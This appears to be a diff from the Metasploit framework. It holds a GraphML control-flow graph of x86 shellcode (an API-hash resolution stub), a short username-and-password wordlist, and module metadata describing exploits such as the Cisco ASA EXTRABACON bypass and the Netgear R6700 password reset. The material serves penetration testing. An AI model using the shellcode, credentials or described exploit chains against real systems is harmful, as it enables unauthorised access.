+          <data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
+        </node>
+        <node id="block.0x1049:instruction.0x104d">
+          <data key="address">0x104d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d6</data>
+          <data key="instruction.source">add esi, edx</data>
+        </node>
+        <node id="block.0x1049:instruction.0x104f">
+          <data key="address">0x104f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31ff</data>
+          <data key="instruction.source">xor edi, edi</data>
+        </node>
+        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
+        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
+        <edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
+      </graph>
+    </node>
+    <node id="block.0x1051">
+      <data key="address">0x1051</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1051</data>
+        <data key="type">block</data>
+        <node id="block.0x1051:instruction.0x1051">
+          <data key="address">0x1051</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31c0</data>
+          <data key="instruction.source">xor eax, eax</data>
+        </node>
+        <node id="block.0x1051:instruction.0x1053">
+          <data key="address">0x1053</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ac</data>
+          <data key="instruction.source">lodsb al, byte ptr [esi]</data>
+        </node>
+        <node id="block.0x1051:instruction.0x1054">
+          <data key="address">0x1054</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1cf0d</data>
+          <data key="instruction.source">ror edi, 0xd</data>
+        </node>
+        <node id="block.0x1051:instruction.0x1057">
+          <data key="address">0x1057</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c7</data>
+          <data key="instruction.source">add edi, eax</data>
+        </node>
+        <node id="block.0x1051:instruction.0x1059">
+          <data key="address">0x1059</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">38e0</data>
+          <data key="instruction.source">cmp al, ah</data>
+        </node>
+        <node id="block.0x1051:instruction.0x105b">
+          <data key="address">0x105b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75f4</data>
+          <data key="instruction.source">jne 0x1051</data>
+        </node>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
+        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
+        <edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
+      </graph>
+    </node>
+    <node id="block.0x105d">
+      <data key="address">0x105d</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x105d</data>
+        <data key="type">block</data>
+        <node id="block.0x105d:instruction.0x105d">
+          <data key="address">0x105d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">037df8</data>
+          <data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
+        </node>
+        <node id="block.0x105d:instruction.0x1060">
+          <data key="address">0x1060</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3b7d24</data>
+          <data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
+        </node>
+        <node id="block.0x105d:instruction.0x1063">
+          <data key="address">0x1063</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75e0</data>
+          <data key="instruction.source">jne 0x1045</data>
+        </node>
+        <edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
+        <edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
+      </graph>
+    </node>
+    <node id="block.0x1065">
+      <data key="address">0x1065</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1065</data>
+        <data key="type">block</data>
+        <node id="block.0x1065:instruction.0x1065">
+          <data key="address">0x1065</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop eax</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1066">
+          <data key="address">0x1066</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5824</data>
+          <data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1069">
+          <data key="address">0x1069</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d3</data>
+          <data key="instruction.source">add ebx, edx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x106b">
+          <data key="address">0x106b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">668b0c4b</data>
+          <data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
+        </node>
+        <node id="block.0x1065:instruction.0x106f">
+          <data key="address">0x106f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b581c</data>
+          <data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1072">
+          <data key="address">0x1072</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d3</data>
+          <data key="instruction.source">add ebx, edx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1074">
+          <data key="address">0x1074</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b048b</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1077">
+          <data key="address">0x1077</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d0</data>
+          <data key="instruction.source">add eax, edx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1079">
+          <data key="address">0x1079</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89442424</data>
+          <data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
+        </node>
+        <node id="block.0x1065:instruction.0x107d">
+          <data key="address">0x107d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop ebx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x107e">
+          <data key="address">0x107e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop ebx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x107f">
+          <data key="address">0x107f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">61</data>
+          <data key="instruction.source">popal</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1080">
+          <data key="address">0x1080</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">59</data>
+          <data key="instruction.source">pop ecx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1081">
+          <data key="address">0x1081</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5a</data>
+          <data key="instruction.source">pop edx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1082">
+          <data key="address">0x1082</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">51</data>
+          <data key="instruction.source">push ecx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x1083">
+          <data key="address">0x1083</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ffe0</data>
+          <data key="instruction.source">jmp eax</data>
+        </node>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
+        <edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
+      </graph>
+    </node>
+    <node id="block.0x1085">
+      <data key="address">0x1085</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1085</data>
+        <data key="type">block</data>
+        <node id="block.0x1085:instruction.0x1085">
+          <data key="address">0x1085</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop eax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1086">
+      <data key="address">0x1086</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1086</data>
+        <data key="type">block</data>
+        <node id="block.0x1086:instruction.0x1086">
+          <data key="address">0x1086</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5f</data>
+          <data key="instruction.source">pop edi</data>
+        </node>
+        <node id="block.0x1086:instruction.0x1087">
+          <data key="address">0x1087</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5a</data>
+          <data key="instruction.source">pop edx</data>
+        </node>
+        <node id="block.0x1086:instruction.0x1088">
+          <data key="address">0x1088</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b12</data>
+          <data key="instruction.source">mov edx, dword ptr [edx]</data>
+        </node>
+        <node id="block.0x1086:instruction.0x108a">
+          <data key="address">0x108a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb83</data>
+          <data key="instruction.source">jmp 0x100f</data>
+        </node>
+        <edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
+        <edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
+        <edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
+      </graph>
+    </node>
+    <edge source="block.0x1000" target="block.0x100f"/>
+    <edge source="block.0x100f" target="block.0x1018"/>
+    <edge source="block.0x1018" target="block.0x101f"/>
+    <edge source="block.0x1018" target="block.0x1021"/>
+    <edge source="block.0x101f" target="block.0x1021"/>
+    <edge source="block.0x1021" target="block.0x1018"/>
+    <edge source="block.0x1021" target="block.0x1029"/>
+    <edge source="block.0x1029" target="block.0x103a"/>
+    <edge source="block.0x1029" target="block.0x1086"/>
+    <edge source="block.0x103a" target="block.0x1045"/>
+    <edge source="block.0x1045" target="block.0x1049"/>
+    <edge source="block.0x1045" target="block.0x1085"/>
+    <edge source="block.0x1049" target="block.0x1051"/>
+    <edge source="block.0x1051" target="block.0x1051"/>
+    <edge source="block.0x1051" target="block.0x105d"/>
+    <edge source="block.0x105d" target="block.0x1045"/>
+    <edge source="block.0x105d" target="block.0x1065"/>
+    <edge source="block.0x1085" target="block.0x1086"/>
+    <edge source="block.0x1086" target="block.0x100f"/>
+  </graph>
+</graphml>
@@ -0,0 +1,4 @@
+suma123 panger123
+debug debug124
+root root126
+guest 
@@ -345,43 +345,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_admin/brocade/brocade_config": {
-    "name": "Brocade Configuration Importer",
-    "fullname": "auxiliary/admin/brocade/brocade_config",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module imports a Brocade device configuration.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 22,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-07-16 20:52:00 +0000",
-    "path": "/modules/auxiliary/admin/brocade/brocade_config.rb",
-    "is_install_path": true,
-    "ref_name": "admin/brocade/brocade_config",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_admin/chromecast/chromecast_reset": {
    "name": "Chromecast Factory Reset DoS",
    "fullname": "auxiliary/admin/chromecast/chromecast_reset",
@@ -474,228 +437,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_admin/cisco/cisco_asa_extrabacon": {
-    "name": "Cisco ASA Authentication Bypass (EXTRABACON)",
-    "fullname": "auxiliary/admin/cisco/cisco_asa_extrabacon",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Sean Dillon <sean.dillon@risksense.com>",
-      "Zachary Harding <zachary.harding@risksense.com>",
-      "Nate Caroe <nate.caroe@risksense.com>",
-      "Dylan Davis <dylan.davis@risksense.com>",
-      "William Webb <william_webb@rapid7.com>",
-      "Jeff Jarmoc <jjarmoc>",
-      "Equation Group",
-      "Shadow Brokers"
-    ],
-    "description": "This module patches the authentication functions of a Cisco ASA\n          to allow uncredentialed logins. Uses improved shellcode for payload.",
-    "references": [
-      "CVE-2016-6366",
-      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp",
-      "URL-https://github.com/RiskSense-Ops/CVE-2016-6366"
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 161,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
-    "path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb",
-    "is_install_path": true,
-    "ref_name": "admin/cisco/cisco_asa_extrabacon",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_admin/cisco/cisco_config": {
-    "name": "Cisco Configuration Importer",
-    "fullname": "auxiliary/admin/cisco/cisco_config",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module imports a Cisco IOS or NXOS device configuration.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 22,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-07-07 21:49:48 +0000",
-    "path": "/modules/auxiliary/admin/cisco/cisco_config.rb",
-    "is_install_path": true,
-    "ref_name": "admin/cisco/cisco_config",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_admin/cisco/cisco_dcnm_download": {
-    "name": "Cisco Data Center Network Manager Unauthenticated File Download",
-    "fullname": "auxiliary/admin/cisco/cisco_dcnm_download",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": "2019-06-26",
-    "type": "auxiliary",
-    "author": [
-      "Pedro Ribeiro <pedrib@gmail.com>"
-    ],
-    "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n        An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n        the full path of the file.\n        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit\n        (see References to understand why).",
-    "references": [
-      "CVE-2019-1619",
-      "CVE-2019-1621",
-      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass",
-      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld",
-      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb",
-      "URL-https://seclists.org/fulldisclosure/2019/Jul/7"
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 443,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": null,
-    "mod_time": "2019-08-29 12:15:20 +0000",
-    "path": "/modules/auxiliary/admin/cisco/cisco_dcnm_download.rb",
-    "is_install_path": true,
-    "ref_name": "admin/cisco/cisco_dcnm_download",
-    "check": false,
-    "post_auth": true,
-    "default_credential": true,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_admin/cisco/cisco_secure_acs_bypass": {
-    "name": "Cisco Secure ACS Unauthorized Password Change",
-    "fullname": "auxiliary/admin/cisco/cisco_secure_acs_bypass",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Jason Kratzer <pyoor@flinkd.org>"
-    ],
-    "description": "This module exploits an authentication bypass issue which allows arbitrary\n        password change requests to be issued for any user in the local store.\n        Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n        as version 5.2 with either no patches or patches 1 and 2 are vulnerable.",
-    "references": [
-      "BID-47093",
-      "CVE-2011-0951",
-      "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 443,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
-    "is_install_path": true,
-    "ref_name": "admin/cisco/cisco_secure_acs_bypass",
-    "check": false,
-    "post_auth": true,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_admin/cisco/vpn_3000_ftp_bypass": {
-    "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",
-    "fullname": "auxiliary/admin/cisco/vpn_3000_ftp_bypass",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": "2006-08-23",
-    "type": "auxiliary",
-    "author": [
-      "aushack <patrick@osisecurity.com.au>"
-    ],
-    "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n        3000 series. It is possible to execute some FTP statements without authentication\n        (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n        when working with CWD commands. This module simply creates an arbitrary directory,\n        verifies that the directory has been created, then deletes it and verifies deletion\n        to confirm the bug.",
-    "references": [
-      "BID-19680",
-      "CVE-2006-4313",
-      "OSVDB-28139",
-      "OSVDB-28138"
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 21,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2017-11-09 03:00:24 +0000",
-    "path": "/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb",
-    "is_install_path": true,
-    "ref_name": "admin/cisco/vpn_3000_ftp_bypass",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_admin/db2/db2rcmd": {
    "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability",
    "fullname": "auxiliary/admin/db2/db2rcmd",
@@ -726,7 +467,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/admin/db2/db2rcmd.rb",
    "is_install_path": true,
    "ref_name": "admin/db2/db2rcmd",
@@ -767,7 +508,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
+    "mod_time": "2020-08-07 16:15:17 +0000",
    "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb",
    "is_install_path": true,
    "ref_name": "admin/dns/dyn_dns_update",
@@ -1324,6 +1065,44 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/http/cisco_7937g_ssh_privesc": {
+    "name": "Cisco 7937G SSH Privilege Escalation",
+    "fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-02",
+    "type": "auxiliary",
+    "author": [
+      "Cody Martin"
+    ],
+    "description": "This module exploits a feature that should not be available \n\tvia the web interface. An unauthenticated user may change \n\tthe credentials for SSH access to any username and password \n\tcombination desired, giving access to administrative \n\tfunctions through an SSH connection.",
+    "references": [
+      "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/",
+      "CVE-2020-16137"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-21 14:55:45 +0000",
+    "path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py",
+    "is_install_path": true,
+    "ref_name": "admin/http/cisco_7937g_ssh_privesc",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/http/cnpilot_r_cmd_exec": {
    "name": "Cambium cnPilot r200/r201 Command Execution as 'root'",
    "fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec",
@@ -1812,12 +1591,13 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n          an unauthenticated attacker to download arbitrary files off the system.\n          The first is an unauthenticated bypass, followed by a path traversal.\n          This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n          A downloaded file is zipped, and this module also unzips it before storing it in the database.\n          By default this module downloads Tomcat's application.properties files, which contains the\n          database password, amongst other sensitive data.\n          At the time of disclosure, this is a 0 day. Versions 2.0.3 and 2.0.2 are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.",
+    "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n          an unauthenticated attacker to download arbitrary files off the system.\n          The first is an unauthenticated bypass, followed by a path traversal.\n          This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n          A downloaded file is zipped, and this module also unzips it before storing it in the database.\n          By default this module downloads Tomcat's application.properties files, which contains the\n          database password, amongst other sensitive data.\n          At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.\n          Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.",
    "references": [
      "CVE-2020-4427",
      "CVE-2020-4429",
      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
-      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33",
+      "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/"
    ],
    "platform": "",
    "arch": "",
@@ -1838,7 +1618,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-05-07 08:03:28 +0000",
+    "mod_time": "2020-06-26 11:38:29 +0000",
    "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/ibm_drm_download",
@@ -2880,6 +2660,65 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/http/netgear_r6700_pass_reset": {
+    "name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset",
+    "fullname": "auxiliary/admin/http/netgear_r6700_pass_reset",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-15",
+    "type": "auxiliary",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>",
+      "Radek Domanski <radek.domanski@gmail.com>",
+      "gwillcox-r7"
+    ],
+    "description": "This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),\n          on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset\n          the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by\n          using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent\n          computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only\n          supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58\n          firmware, however support for other firmware versions may be added in the future.\n\n          Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a\n          special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can\n          then log into this telnet server using the new password, and obtain a shell as the \"root\" user.\n\n          These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.\n          It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.\n          As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit\n          this vulnerability once per reboot of the router.\n\n          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n          Radek Domanski).",
+    "references": [
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md",
+      "URL-https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders",
+      "CVE-2020-10923",
+      "CVE-2020-10924",
+      "ZDI-20-703",
+      "ZDI-20-704"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 5000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-06-30 16:46:16 +0000",
+    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/netgear_r6700_pass_reset",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "config-changes"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/http/netgear_soap_password_extractor": {
    "name": "Netgear Unauthenticated SOAP Password Extractor",
    "fullname": "auxiliary/admin/http/netgear_soap_password_extractor",
@@ -3654,7 +3493,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-09-23 15:29:38 +0000",
+    "mod_time": "2020-08-21 15:30:55 +0000",
    "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "admin/http/telpho10_credential_dump",
@@ -4588,43 +4427,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_admin/juniper/juniper_config": {
-    "name": "Juniper Configuration Importer",
-    "fullname": "auxiliary/admin/juniper/juniper_config",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module imports a Juniper ScreenOS or JunOS device configuration.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 22,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
-    "path": "/modules/auxiliary/admin/juniper/juniper_config.rb",
-    "is_install_path": true,
-    "ref_name": "admin/juniper/juniper_config",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
    "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
    "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
